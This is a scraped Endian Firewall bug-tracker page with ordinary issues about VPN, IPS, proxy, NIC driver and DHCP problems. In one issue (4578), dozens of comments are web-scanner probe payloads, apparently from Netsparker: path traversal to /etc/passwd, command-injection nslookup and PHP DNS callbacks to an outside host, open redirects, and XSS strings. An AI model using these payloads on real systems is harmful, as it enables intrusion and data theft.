MantisBT

View Issue Details
4576 [Endian Firewall] VPN - IPSec major unable to reproduce 2013-09-24 13:35 2017-08-26 00:33
jeevan  
 
urgent  
feedback 2.5  
open  
none    
none  
   
IPsec VPN for 3 sites
I need to connect with IPsec for 3 sites:
1. Site-A
2. Site-B
3. Site-C

I am able to connect Site A and B but not able to connect Site A and C.
Can you please suggest?
There are no notes attached to this issue.





View Issue Details
4578 [Endian Firewall] Intrusion Prevention major sometimes 2013-10-02 10:50 2017-05-16 22:35
mhLearn  
Anonymous  
high 2.5.2  
resolved 2.5  
fixed  
none    
none future  
   
Remote Desktop Connection Failed When "Allow With IPS"
Remote Desktop Connection, ports 3389 and 3390, were set to Allow With IPS on outgoing traffic and were working fine all the time from version 2.5.1; then upgraded to 2.5.2 last month.

After the snort rule was auto-updated this afternoon, it failed to work. Changed the rule to just Allow, then it was able to get through.

In the firewall log, it showed "OUTGOINGFW:ALLOW:12" when the ports were Allow With IPS, but connections failed. But if changed to Allow, it showed "OUTGOINGFW:ACCEPT:12" and the connection was successful.
Things done to test:

1. Restart efw system
2. Save and restart the SNORT
3. Tried on different computers
4. Tried on different zones
IPS_error_tcp port 1433.jpg (29,593) 2013-10-03 02:12
https://bugs.endian.com/file_download.php?file_id=1062&type=bug
Notes
(0008546)
mhLearn   
2013-10-03 01:52   
The same case happened to ports 1433 and 3306, from internal zones to RED. Need to disable "Allow With IPS" or disable Intrusion Prevention; only then does it work fine again.
2017-05-16 21:52   
/\r87.com/?bugs.endian.com/
(0009021)
Anonymous   
2017-05-16 21:52   
3
(0009022)
Anonymous   
2017-05-16 21:52   
/../../../../../../../../../../proc/version
(0009023)
Anonymous   
2017-05-16 21:53   
3
(0009024)
Anonymous   
2017-05-16 21:53   
/\r87.com/?bugs.endian.com/
(0009025)
Anonymous   
2017-05-16 21:53   
/../../../../../../../../../../proc/version.php
(0009026)
Anonymous   
2017-05-16 21:53   
3
(0009027)
Anonymous   
2017-05-16 21:54   
///r87.com/?bugs.endian.com/
(0009028)
Anonymous   
2017-05-16 21:54   
/../../../../../../../../../../proc/version.php
(0009029)
Anonymous   
2017-05-16 21:54   
3
(0009030)
Anonymous   
2017-05-16 21:54   
///r87.com/?bugs.endian.com/
(0009031)
Anonymous   
2017-05-16 21:54   
/../../../../../../../../../../../etc/passwd
(0009032)
Anonymous   
2017-05-16 21:54   
3
(0009033)
Anonymous   
2017-05-16 21:55   
<iframe src="http://r87.com/?"></iframe> [^]
(0009034)
Anonymous   
2017-05-16 21:55   
file:///etc/passwd [^]
(0009035)
Anonymous   
2017-05-16 21:55   
3
(0009036)
Anonymous   
2017-05-16 21:56   
<iframe src="http://r87.com/?"></iframe> [^]
(0009037)
Anonymous   
2017-05-16 21:56   
file:///etc/passwd [^]
(0009038)
Anonymous   
2017-05-16 21:56   
3
(0009039)
Anonymous   
2017-05-16 21:56   
bugs.endian.com.r87.com/?
(0009040)
Anonymous   
2017-05-16 21:57   
/../../../../../../../../../../../etc/passwd
(0009041)
Anonymous   
2017-05-16 21:57   
3
(0009042)
Anonymous   
2017-05-16 21:57   
bugs.endian.com.r87.com/?
(0009043)
Anonymous   
2017-05-16 21:57   
/../../../../../../../../../../../etc/passwd
(0009044)
Anonymous   
2017-05-16 21:57   
3
(0009045)
Anonymous   
2017-05-16 21:58   
http://bugs.endian.com.r87.com/? [^]
(0009046)
Anonymous   
2017-05-16 21:58   
/../../../../../../../../../../../etc/passwd.php
(0009047)
Anonymous   
2017-05-16 21:58   
3
(0009048)
Anonymous   
2017-05-16 21:58   
http://bugs.endian.com.r87.com/? [^]
(0009049)
Anonymous   
2017-05-16 21:59   
3
(0009050)
Anonymous   
2017-05-16 21:59   
/../../../../../../../../../../../etc/passwd.php
(0009051)
Anonymous   
2017-05-16 21:59   
https://bugs.endian.com.r87.com/? [^]
(0009052)
Anonymous   
2017-05-16 22:00   
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
(0009053)
Anonymous   
2017-05-16 22:00   
3
(0009054)
Anonymous   
2017-05-16 22:00   
3
(0009055)
Anonymous   
2017-05-16 22:00   
/../../../../../../../../../../../etc/passwd
(0009056)
Anonymous   
2017-05-16 22:01   
3
(0009057)
Anonymous   
2017-05-16 22:01   
/../../../../../../../../../../../etc/passwd
(0009058)
Anonymous   
2017-05-16 22:01   
3
(0009059)
Anonymous   
2017-05-16 22:02   
/etc/passwd
(0009060)
Anonymous   
2017-05-16 22:02   
3
(0009061)
Anonymous   
2017-05-16 22:02   
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(0009062)
Anonymous   
2017-05-16 22:02   
3
(0009063)
Anonymous   
2017-05-16 22:03   
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(0009064)
Anonymous   
2017-05-16 22:03   
data:;base64,TlM3NzU0NTYxNDQ2NTc1
(0009065)
Anonymous   
2017-05-16 22:04   
3
(0009066)
Anonymous   
2017-05-16 22:04   
3
(0009067)
Anonymous   
2017-05-16 22:04   
data:;base64,TlM3NzU0NTYxNDQ2NTc1
(0009068)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63otcgp-y6dqynqnervrovktzjzynwaeq'.'xri.r87.me'))
(0009069)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63ochkzzu9cfm8_bcig7vxuuqsrym2qwg'.'kx8.r87.me'))
(0009070)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63ouonltlzem2rd8iedqvh7-arui4yhti'.'2tq.r87.me'));
(0009071)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63osymwsmdhnln907u3m7ueza728nrupx'.'lbw.r87.me'));
(0009072)
Anonymous   
2017-05-16 22:04   
+gethostbyname(trim('8b_dpll63ooacuumnubqrb0a65uejw1hjxvxkg3g'.'t70.r87.me'));//
(0009073)
Anonymous   
2017-05-16 22:04   
+gethostbyname(trim('8b_dpll63o49kgeogdg5jislakjblhrd0_51z6xz'.'9io.r87.me'));//
(0009074)
Anonymous   
2017-05-16 22:04   
bug_update.php
(0009075)
Anonymous   
2017-05-16 22:04   
'+gethostbyname(trim('8b_dpll63opep4djzed3o6ljr93wax4wtjh-ibxh'.'hoa.r87.me'))+'
(0009076)
Anonymous   
2017-05-16 22:05   
'+gethostbyname(trim('8b_dpll63or8a-4bw2gespg-gra4vr4lmp_gfacn'.'mwg.r87.me'))+'
(0009077)
Anonymous   
2017-05-16 22:05   
"+gethostbyname(trim('8b_dpll63o6fd98rnyscfsyssvjwm4ksnt3hyedu'.'tci.r87.me'))+"
(0009078)
Anonymous   
2017-05-16 22:05   
"+gethostbyname(trim('8b_dpll63o2zij7m8vctodgvlwiqotvctrccux6a'.'dra.r87.me'))+"
(0009079)
Anonymous   
2017-05-16 22:05   
<? gethostbyname(trim('8b_dpll63ohc62hck5jyroogdlkzfwoh3ptl9jze'.'1j0.r87.me'));//?>
(0009080)
Anonymous   
2017-05-16 22:05   
<? gethostbyname(trim('8b_dpll63oqjkco-gsrki1djghz1zg-ulvcyvbo-'.'hym.r87.me'));//?>
(0009081)
Anonymous   
2017-05-16 22:05   
'{${gethostbyname(trim('8b_dpll63o8nvknodtol14mnb7rlqeplrb_zcn1b'.'yp8.r87.me'))}}'
(0009082)
Anonymous   
2017-05-16 22:05   
'{${gethostbyname(trim('8b_dpll63o_ru1v0hwcyjhysekbcretpx6dco4g2'.'fke.r87.me'))}}'
(0009083)
Anonymous   
2017-05-16 22:05   
3
(0009084)
Anonymous   
2017-05-16 22:05   
bug_update.php
(0009085)
Anonymous   
2017-05-16 22:05   
nslookup 8b_dpll63ojeksqnorc_oazpvo_14hfjkbgb2-qohja.r87.me&'\"`0&nslookup 8b_dpll63ojeksqnorc_oazpvo_14hfjkbgb2-qohja.r87.me&`'
(0009086)
Anonymous   
2017-05-16 22:06   
bug_update.php
(0009087)
Anonymous   
2017-05-16 22:06   
nslookup 8b_dpll63ooi8vli1gn7w2nu4ghzoaozyiubqm8h_ic.r87.me&'\"`0&nslookup 8b_dpll63ooi8vli1gn7w2nu4ghzoaozyiubqm8h_ic.r87.me&`'
(0009088)
Anonymous   
2017-05-16 22:06   
bug_update.php
(0009089)
Anonymous   
2017-05-16 22:06   
3
(0009090)
Anonymous   
2017-05-16 22:06   
& nslookup 8b_dpll63o_tnkjdnmmr47gac8oj5gsbzpw-xviot3m.r87.me&'\"`0&nslookup 8b_dpll63o_tnkjdnmmr47gac8oj5gsbzpw-xviot3m.r87.me&`'
(0009091)
Anonymous   
2017-05-16 22:07   
& nslookup 8b_dpll63obedgv1-ttj4sgtvdgis1kfkect2aewlue.r87.me&'\"`0&nslookup 8b_dpll63obedgv1-ttj4sgtvdgis1kfkect2aewlue.r87.me&`'
(0009092)
Anonymous   
2017-05-16 22:07   
3
(0009093)
Anonymous   
2017-05-16 22:07   
'& nslookup 8b_dpll63okdb1cdhnbdlrsohtmukjlyy51ny198a3m.r87.me&'\"`0&nslookup 8b_dpll63okdb1cdhnbdlrsohtmukjlyy51ny198a3m.r87.me&`'
(0009094)
Anonymous   
2017-05-16 22:08   
'& nslookup 8b_dpll63ovneaw-m2i_edcfq0mdlijxbqvoaaij6o4.r87.me&'\"`0&nslookup 8b_dpll63ovneaw-m2i_edcfq0mdlijxbqvoaaij6o4.r87.me&`'
(0009095)
Anonymous   
2017-05-16 22:08   
"& nslookup 8b_dpll63oi6q4ofbyddmmtss0nv7tuwkphrrhnmq4w.r87.me&'\"`0&nslookup 8b_dpll63oi6q4ofbyddmmtss0nv7tuwkphrrhnmq4w.r87.me&`'
(0009096)
Anonymous   
2017-05-16 22:08   
3
(0009097)
Anonymous   
2017-05-16 22:09   
"& nslookup 8b_dpll63ota3bqapbvc2m3zz-aysmcob8bwraku7aq.r87.me&'\"`0&nslookup 8b_dpll63ota3bqapbvc2m3zz-aysmcob8bwraku7aq.r87.me&`'
(0009098)
Anonymous   
2017-05-16 22:09   
nslookup "8b_dpll63okhnedivjy4m41zgztyfqfhb4puiemi""qlg.r87.me"
(0009099)
Anonymous   
2017-05-16 22:09   
3
(0009100)
Anonymous   
2017-05-16 22:10   
nslookup "8b_dpll63oyicukspqrdibjxlxvax7hmkhd12_cj""b5i.r87.me"
(0009101)
Anonymous   
2017-05-16 22:10   
&nslookup "8b_dpll63olmt9ymebb7plj-sz1asystjqrz4cww""kvi.r87.me"
(0009102)
Anonymous   
2017-05-16 22:10   
3
(0009103)
Anonymous   
2017-05-16 22:10   
&nslookup "8b_dpll63ojloyx5jdgjasdm8x3fybvqpjdygznk""9yo.r87.me"
(0009104)
Anonymous   
2017-05-16 22:11   
'&nslookup "8b_dpll63o4axenw_jidyhcporqykodccszaabru""oec.r87.me"
(0009105)
Anonymous   
2017-05-16 22:11   
3
(0009106)
Anonymous   
2017-05-16 22:11   
'&nslookup "8b_dpll63olj9mq23aorjnvygkzlzptxeqeahosu""2sw.r87.me"
(0009107)
Anonymous   
2017-05-16 22:12   
"&nslookup "8b_dpll63ovd3pmzcoahjsblmll-wj9l7fph4xni""_ys.r87.me"
(0009108)
Anonymous   
2017-05-16 22:12   
3
(0009109)
Anonymous   
2017-05-16 22:12   
"&nslookup "8b_dpll63oople7aqutkogv9ejwby9tcbzqjbjsv""x-w.r87.me"
(0009110)
Anonymous   
2017-05-16 22:13   
|nslookup${IFS}"8b_dpll63oifsxv8m5zrxtxannvb9mdmgeh8wgvk""yrs.r87.me"
(0009111)
Anonymous   
2017-05-16 22:13   
3
(0009112)
Anonymous   
2017-05-16 22:13   
|nslookup${IFS}"8b_dpll63owrreeei0vj04uqh8ptar_dmu8lj7ne""668.r87.me"
(0009113)
Anonymous   
2017-05-16 22:14   
3
(0009114)
Anonymous   
2017-05-16 22:15   
3
(0009115)
Anonymous   
2017-05-16 22:15   
3
(0009116)
Anonymous   
2017-05-16 22:16   
'"--></style></scRipt><scRipt>netsparker(0x007652)</scRipt>
(0009117)
Anonymous   
2017-05-16 22:16   
'"--></style></scRipt><scRipt>netsparker(0x007653)</scRipt>
(0009118)
Anonymous   
2017-05-16 22:16   
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007656%29%3C%2FscRipt%3E
(0009119)
Anonymous   
2017-05-16 22:16   
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007657%29%3C%2FscRipt%3E
(0009120)
Anonymous   
2017-05-16 22:17   
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3NjU4KTwvc2NyaXB0Pg==
(0009121)
Anonymous   
2017-05-16 22:17   
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3NjU5KTwvc2NyaXB0Pg==
(0009122)
Anonymous   
2017-05-16 22:17   
'" ns=netsparker(0x00765A)
(0009123)
Anonymous   
2017-05-16 22:18   
'" ns=netsparker(0x00765B)
(0009124)
Anonymous   
2017-05-16 22:18   
1 ns=netsparker(0x00765C)
(0009125)
Anonymous   
2017-05-16 22:18   
1 ns=netsparker(0x00765D)
(0009126)
Anonymous   
2017-05-16 22:19   
//r87.com/n/n.css?0x007666
(0009127)
Anonymous   
2017-05-16 22:19   
//r87.com/n/n.css?0x007667
(0009128)
Anonymous   
2017-05-16 22:19   
//r87.com/n/j/?0x007668
(0009129)
Anonymous   
2017-05-16 22:20   
//r87.com/n/j/?0x007669
(0009130)
Anonymous   
2017-05-16 22:20   
'><net sparker=netsparker(0x00766A)>
(0009131)
Anonymous   
2017-05-16 22:20   
'><net sparker=netsparker(0x00766B)>
(0009132)
Anonymous   
2017-05-16 22:21   
"><net sparker=netsparker(0x00766C)>
(0009133)
Anonymous   
2017-05-16 22:21   
"><net sparker=netsparker(0x00766D)>
(0009134)
Anonymous   
2017-05-16 22:21   
<iMg src=N onerror=netsparker(0x00766E)>
(0009135)
Anonymous   
2017-05-16 22:22   
<iMg src=N onerror=netsparker(0x00766F)>
(0009136)
Anonymous   
2017-05-16 22:22   
javascript:netsparker(0x007670)
(0009137)
Anonymous   
2017-05-16 22:22   
javascript:netsparker(0x007671)
(0009138)
Anonymous   
2017-05-16 22:23   
<scRipt>ns(0x007672)</scRipt>
(0009139)
Anonymous   
2017-05-16 22:23   
<scRipt>ns(0x007673)</scRipt>
(0009140)
Anonymous   
2017-05-16 22:24   
n;ns:expression(netsparker(0x007674));
(0009141)
Anonymous   
2017-05-16 22:24   
n;ns:expression(netsparker(0x007675));
(0009142)
Anonymous   
2017-05-16 22:24   
body{x:expression(netsparker(0x007676))}
(0009143)
Anonymous   
2017-05-16 22:25   
body{x:expression(netsparker(0x007677))}
(0009144)
Anonymous   
2017-05-16 22:25   
*/netsparker(0x007678);/*
(0009145)
Anonymous   
2017-05-16 22:25   
*/netsparker(0x007679);/*
(0009146)
Anonymous   
2017-05-16 22:26   
'+netsparker(0x00767A)+'
(0009147)
Anonymous   
2017-05-16 22:26   
'+netsparker(0x00767B)+'
(0009148)
Anonymous   
2017-05-16 22:27   
"+netsparker(0x00767C)+"
(0009149)
Anonymous   
2017-05-16 22:27   
"+netsparker(0x00767D)+"
(0009150)
Anonymous   
2017-05-16 22:27   
\';netsparker(0x00767E);///
(0009151)
Anonymous   
2017-05-16 22:28   
\';netsparker(0x00767F);///
(0009152)
Anonymous   
2017-05-16 22:28   
',netsparker(0x007680),'
(0009153)
Anonymous   
2017-05-16 22:28   
',netsparker(0x007681),'
(0009154)
Anonymous   
2017-05-16 22:29   
 netsparker(0x007682)
(0009155)
Anonymous   
2017-05-16 22:29   
 netsparker(0x007683)
(0009156)
Anonymous   
2017-05-16 22:30   

netsparker(0x007684);
(0009157)
Anonymous   
2017-05-16 22:30   

netsparker(0x007685);
(0009158)
Anonymous   
2017-05-16 22:30   
'+netsparker(0x007686)+'
(0009159)
Anonymous   
2017-05-16 22:31   
'+netsparker(0x007687)+'
(0009160)
Anonymous   
2017-05-16 22:31   
'"@--></style></scRipt><scRipt>netsparker(0x007688)</scRipt>
(0009161)
Anonymous   
2017-05-16 22:32   
'"@--></style></scRipt><scRipt>netsparker(0x007689)</scRipt>
(0009162)
Anonymous   
2017-05-16 22:32   
[ns](javascript:netsparker(0x00768A);)
(0009163)
Anonymous   
2017-05-16 22:32   
[ns](javascript:netsparker(0x00768B);)
(0009164)
Anonymous   
2017-05-16 22:33   
//r87.com/?0x0076B0
(0009165)
Anonymous   
2017-05-16 22:33   
//r87.com/?0x0076B1
(0009166)
Anonymous   
2017-05-16 22:34   
3
(0009167)
Anonymous   
2017-05-16 22:34   
3
(0009168)
Anonymous   
2017-05-16 22:35   
3





View Issue Details
3483 [Endian Firewall] Proxy HTTP major always 2011-02-15 20:27 2014-07-28 18:10
am89  
lorenzo-endian  
normal  
feedback 2.4.1  
reopened  
none    
none  
   
Http proxy error 110 connection timed out
Hi! I've configured Endian as a firewall and transparent proxy and all seemed to work well until some days ago. Now when I try to connect to mail.alice.it, an Italian provider, I can't because the proxy gives me this message: (110) error connection timed out. But if I turn off the proxy it works. I have cleaned the cache and also turned the proxy off and then on, and also restarted Endian, but with the proxy on the page doesn't work... why?
Notes
(0005724)
lorenzo-endian   
2011-02-17 14:23   
hi am89,

you are right. The problem is that alice.it is in the blacklists we are using. I hope we are able to solve the problem as soon as possible.

Thanks again

Lo
(0005738)
lorenzo-endian   
2011-02-22 10:56   
hi am89,

Can you check if the problem is still there? Now the blacklists seem to be OK.

Let me know the results of your tests and thanks in advance

Lo
(0005740)
am89   
2011-02-22 12:39   
Now it works! thanks for all!
(0005741)
lorenzo-endian   
2011-02-22 13:17   
Hi am89,

no problem, you are always welcome!

Have a nice day and happy hacking!

Lo
(0008554)
Anonymous   
2014-07-28 18:10   
Same here
http://mail.steripharma.com.ve/





View Issue Details
1126 [Endian Firewall] Other Services major have not tried 2008-07-14 13:13 2014-01-08 06:52
simon-endian  
chris-endian  
normal  
resolved  
fixed  
none    
none  
  future  
Traffic Monitoring Administration interface does not work
 problem in Services --> Traffic Monitoring : Administration
interface does not work... I need to disable then enable traffic
monitoring for accessing to the web console... but many hours of
data is not collected...
Notes
(0004974)
Anonymous   
2010-10-25 09:24   
(edited on: 2010-10-25 09:26)
I also got this error - but with the current version (with a fresh installed v2.4 and smart update/upgrade). Sometimes the Webpage works but only for a short period of time.

(0007955)
mhLearn   
2012-07-23 02:37   
My case is worse. The WebGUI is blank only.





View Issue Details
4394 [Endian Firewall] Hardware related (kernel, drivers, hardware) tweak always 2012-07-18 14:45 2013-11-26 15:39
EDV-Team  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none future  
   
Support for Intel 82580 based network cards (Ethernet-Server-Adapter I340-T4)
The Intel Ethernet-Server-Adapter I340-T4 and other Intel 82580 based network cards don't work on Endian 2.5.1.
There is a Linux driver on the Intel website:
http://downloadcenter.intel.com/detail_desc.aspx?agr=Y&DwnldID=13663

Please add this driver to EFW Community Edition or provide a Kernel source package so that users can compile the driver itself.

Thank you very much!
Notes
(0008011)
svenasse   
2012-08-16 15:42   
I'm using the commercial version of Endian 2.5 and am having issues with the Intel 82580 support. This was not an issue with Endian 2.4.

/lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz is the 1.3.9 version and is loaded by modprobe. This version does not work. The Endian 2.5 install didn't even recognise that I had the card, as /etc/modprobe.conf made no mention of the igb driver. I had to either add "alias eth igb" to /etc/modprobe.conf or execute "modprobe igb", and saw from dmesg that it loaded 1.3.9 but did not initialise the 4 Ethernet ports.

/lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko is the 2.4.8 version and was installed by the kernel-module-igb-2.4.8-2.endian2_2.6.32.43_57.e43.rpm. While this version is two years old it does work with my hardware. I could only test this by using insmod. This was how our server was able to limp through the day yesterday.

Last night I applied the e44 updates with no resolution to the problem. I then did a second clean install from the Endian 2.5 ISO. I caught the error when I ran "modinfo igb" and noted the 1.3.9 version and location of this driver.

My solution was:
# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# depmod -a
# shutdown -r now

This process had to be repeated after I applied the e44 updates.
(0008305)
dbinary   
2012-11-13 19:29   
(edited on: 2012-11-13 19:30)
The procedure that worked for me in endian UTM 2.5 is:

# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# modprobe igb
# depmod -a
# reboot

(0008364)
EDV-Team   
2013-01-23 10:03   
Thank you very much for your feedback! It works! :)

All I had to do was:
1. Switch to development channel with 'efw-upgrade -s'
2. smart install igb
3. gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
4. vi /etc/modprobe.conf (add "alias eth igb")
5. depmod -a
6. reboot
(0008371)
d072330   
2013-02-13 06:25   
How do you do this if you cannot get past the wizard? I have tried to connect to the serial port to install the Intel drivers but have had no luck getting connected.
(0008372)
EDV-Team   
2013-02-13 08:05   
Our Endian Firewall is running on a Dell PowerEdge R210 Server that has two Broadcom on-board NICs. We changed only the additional PCIe Broadcom network card with the Intel Server Adapter to have 6 Ethernet ports instead of 4 ports.

If you have no other working network card in your system, then it's really hard to install the Intel network drivers.
(0008373)
d072330   
2013-02-13 14:55   
I have one working NIC.
(0008375)
dbinary   
2013-02-13 18:21   
It is not necessary to pass the wizard; just connect a monitor and press option 0 from the menu, then after enabling the SSH service log in over SSH and follow the steps.


# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# modprobe igb
# depmod -a
# reboot
(0008376)
d072330   
2013-02-13 18:50   
This directory does not exist on my machine.

/lib/modules/2.6.32.43-57.e43/kernel/drivers/net/

I only have this directory: /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/

Do I need to do something with this file first (igb-4.1.2.tar.gz)?
(0008377)
EDV-Team   
2013-02-13 20:14   
You need an Internet connection on your Endian Firewall to download the IGB driver package from Endian's "development channel". Use 'efw-upgrade -s' to switch to this channel and 'smart install igb' to download and install the driver package.
(0008378)
d072330   
2013-02-14 23:56   
Got to the Internet and did these steps:

1. Switch to development channel with 'efw-upgrade -s'
2. smart install igb
3. gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
4. vi /etc/modprobe.conf (add "alias eth igb")
5. depmod -a
6. reboot

When I rebooted it still did not see the extra NICs. When I do a lsmod | grep igb nothing shows, but if we grep for igb we get this:

kernel-module-igb-2.4.8-2.endian2_2.6.32.43_57.e43
igb-2.4.8-2.endian2_2.6.32.43_57.e43

Why after reboot is the driver not sticking?
(0008379)
EDV-Team   
2013-02-15 05:34   
Try this:
1. cp /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/
2. modprobe igb
3. depmod -a
4. reboot
(0008382)
d072330   
2013-02-19 05:23   
What worked for us was getting the latest Intel driver and installing it.
(0008463)
luca-endian   
2013-08-26 08:37   
I think this should be fixed with 2.5.2
(0008466)
EDV-Team   
2013-08-26 09:29   
No! Intel 82580 based network cards are still not supported in Endian 2.5.2, because the Intel IGB driver included in Kernel 2.6.32 is too old and doesn't support this chipset!

IGB driver version in Endian 2.5.2 is: 1.3.16
To get Intel 82580 based cards to work we need at least driver version 2.4.x.
(Because of this there was a separate IGB driver package for a while in the Endian 2.5.1 development channel that includes driver version 2.4.8)

Please provide a newer Intel IGB driver to support these cards!
(Latest Version of the driver is 5.0.5)
(0008514)
Mike_Seaman   
2013-09-06 15:35   
I have confirmed this issue. I can replicate on upgrade and clean install.
Please 'rpmbuild -tb igb.tar.gz' latest IGB driver 5.0.5 from https://downloadcenter.intel.com/confirm.aspx?httpDown=http://downloadmirror.intel.com/13663/eng/igb-5.0.5.tar.gz&lang=eng&Dwnldid=13663

or allow us to download kernel-dev SRPMS so that we can compile our own drivers.

thank you
(0008551)
Mike_Seaman   
2013-10-09 15:36   
bump. This fix will only take 20 minutes. what is the status?
(0008552)
Anonymous   
2013-11-26 15:39   
http://jira.endian.com/browse/CORE-629





View Issue Details
4033 [Endian Firewall] GUI minor always 2011-07-22 08:28 2013-11-23 03:34
davide-endian  
Anonymous  
normal  
resolved 2.4  
fixed  
none    
none future  
   
wrong redirection from the / url, when natted
endian_appliance: endian appliance on a local network.
public_server: computer on the same local network and with a public IP.

On public_server there's a NAT rule for connections to tcp port 10444, mapping it to endian_appliance:10443

Connecting to https://public_server:10444/ the correct certificate exchange with endian_appliance takes place, but after that the login never appears, since you're redirected to https://local_ip_of_endian_appliance:10443/
Connecting to https://public_server:10444/manage/dashboard/ (or other /manage/ or /cgi-bin/ URLs) works fine.
There are no notes attached to this issue.





View Issue Details
2811 [Endian Firewall] Other Services major always 2010-04-02 04:53 2013-10-14 17:09
CALYSTO  
test  
normal  
feedback 2.3  
reopened  
none    
none  
   
Dynamic DNS with zoneedit doesn't work for an empty Host Name
Hi, I'm having problems with the Dynamic DNS service when I use zoneedit. I put the file of the issue 0001372.
This works fine when I fill in something in the Host Name field; zoneedit updates the changes really fast. But in zoneedit I don't need to complete this field (Host Name), so when I don't write anything in Host Name and click on Add, the line of the new dynamic DNS appears but doesn't update in the zoneedit zone.
I come from IpCop, but when I discovered Endian, I tried and tried and tried because this is a really good firewall and I really like it, more than IpCop, but I can't make it work.
Please help.

Thanks for all.
There are no notes attached to this issue.





View Issue Details
4573 [Endian Firewall] DHCP Server minor always 2013-09-19 17:41 2013-09-26 16:41
junior.eng.br  
junior.eng.br  
high  
resolved 2.5  
fixed  
none    
none  
   
dhcp fixedleases
When we insert or delete a fixed MAC in the DHCP Server, the rule does not apply.
Services --> Add a fixed lease
Capturar_dhcp.PNG (11,590) 2013-09-19 17:41
https://bugs.endian.com/file_download.php?file_id=1060&type=bug
Notes
(0008530)
daniele-endian   
2013-09-20 08:52   
Check the permissions under /var/efw/dhcp/; all the files should have nobody:nobody as owner.

root@endian:~ # ls -lh /var/efw/dhcp/
total 12K
-rw-r--r-- 1 nobody nobody 0 Aug 20 16:14 custom.tpl
-rw-r--r-- 1 nobody nobody 0 Sep 13 2012 empty
-rw-r--r-- 1 nobody nobody 36 Jul 29 15:50 fixleases
-rw-r--r-- 1 nobody nobody 562 Aug 20 16:14 settings
-rw-r--r-- 1 nobody nobody 526 Aug 20 16:14 settings.old
(0008541)
junior.eng.br   
2013-09-26 16:40   
Solved
(0008542)
junior.eng.br   
2013-09-26 16:41   
Permissions, Solved





View Issue Details
4577 [Endian Firewall] Uncategorized major always 2013-09-25 05:06 2013-09-25 05:06
kjameson  
 
normal  
new  
open  
none    
none  
   
Version 2.4.1 Memory Leak
Memory Leak - Exactly same as 0000117 - Must reboot every week ... otherwise system crashes.
Wait 1 week ...
Apparently this never got fixed?
There are no notes attached to this issue.





View Issue Details
4272 [Endian Firewall] Hardware related (kernel, drivers, hardware) minor always 2012-02-05 19:56 2013-09-24 20:53
Byzt  
 
normal  
acknowledged 2.5  
open  
none    
none  
   
Endian 2.5.1 does not support IBM x3250 Servers
I'm installing Endian 2.5.1 on an IBM x3250 but it is not supported. Endian 2.4.1 is working on the x3250.
x3250 model no : 4364
Notes
(0007697)
Byzt   
2012-02-05 20:00   
"Your Harddisk is to small"
(0007702)
christian-endian   
2012-02-07 12:15   
Can you have a look at the second console (you can switch with Alt+F2) and see what the problem is?

Thanks
(0007705)
aocsody   
2012-02-09 12:18   
(edited on: 2012-02-10 14:15)
We have the same issue: this kernel does not support MPT SAS RAID.
Is there any available solution for this problem?

(0007715)
aocsody   
2012-02-13 15:47   
There was a solution for the upgrade 2.3-->2.4.1. Here is the ticket number: 0003259. Maybe it's the same issue...
Thx
(0007845)
Byzt   
2012-04-24 15:34   
I'm trying to install again, but we get the same issue.
I pressed Alt+F2 and we got "hard drive not found".

What can I do?
(0008363)
aocsody   
2013-01-18 21:03   
Hi! Is there any new information or a solution to the problem? We would like to upgrade the system, but if the latest iso (kernel) does not include the required raid driver we cannot do that.
Thx!
(0008536)
tiagoaviz   
2013-09-24 20:53   
We really really need this fixed ASAP.

There are many customers, even in the Enterprise version, unable to install EFW onto IBM hardware because of this lack of support.





View Issue Details
3266 [Endian Firewall] DHCP Server tweak always 2010-11-08 08:31 2013-09-24 09:04
gmar_87  
simon-endian  
normal  
resolved 2.4  
fixed  
none    
none 2.3  
   
Expired Leases
Expired DHCP leases are never cleared from Endian Firewall.
I have leases from August 2010 still appearing in the web-interface.
The only way I can clear them is to edit or delete the dhcpd.leases file in /var/efw/dhcp

Can a feature be added so that we can choose how long to keep expired leases (1 week, 2 weeks, etc..)?
Endian_2.4.1_DHCP_ExpiredLease.jpg (22,123) 2010-11-24 09:20
https://bugs.endian.com/file_download.php?file_id=549&type=bug
Notes
(0005181)
gmar_87   
2010-11-23 07:34   
An option to clear all dynamic leases regardless of age would also be much appreciated.
(0005183)
lorenzo-endian   
2010-11-23 10:06   
Hi gmar_87,

In "Services" >> "DHCP server", if you click on the "+" sign, you should be able to set the leases for the DHCP ...

Does a reconfiguration of these setup solve the problem?

Thanks in advance!

Lo
(0005190)
gmar_87   
2010-11-24 09:19   
